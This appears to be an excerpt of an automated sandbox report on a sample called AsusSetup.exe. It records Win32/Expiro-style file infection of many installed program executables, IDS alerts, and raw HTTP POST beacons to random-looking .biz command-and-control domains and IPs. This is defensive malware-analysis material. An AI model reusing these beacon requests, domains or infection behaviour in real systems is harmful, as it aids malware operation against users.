Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

Networking

Source: Network traffic; Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:64098 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49709 -> 44.221.84.105:80
Source: Network traffic; Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:62067 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50012 -> 18.246.231.120:80
Source: Network traffic; Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:53826 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.5:55131 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50068 -> 18.208.156.248:80
Source: Network traffic; Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.5:53034 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.5:58235 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:61825 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:53017 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.5:60710 -> 1.1.1.1:53
Source: unknown; DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown; Network traffic detected: DNS query count 128
Source: global traffic; DNS traffic detected: number of DNS queries: 128
Source: Joe Sandbox View; IP Address: 165.160.15.20
Source: Joe Sandbox View; IP Address: 3.254.94.185
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49707
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49707
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49919
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49919
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49930
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49930
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:49975
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:49975
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49966
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49966
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:50012
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:50012
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50006
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50006
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50002
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50002
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:50023
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:50023
Source: Network traffic; Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50003
Source: Network traffic; Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50003
Source: global trafficHTTP traffic detected: POST /afgoll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dovasmbpdb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /arqypullvoovtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qtybvvfgdyqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bdnjndwcxvdfjwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /krccyasm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tlre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ewf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vdqmhlkrsphqhe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yqjotihouwfthlkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oukjvuscvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ohp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ava HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xmqlmgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /os HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rwiegx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vrhdofwiluexay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oomorpsdyukh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
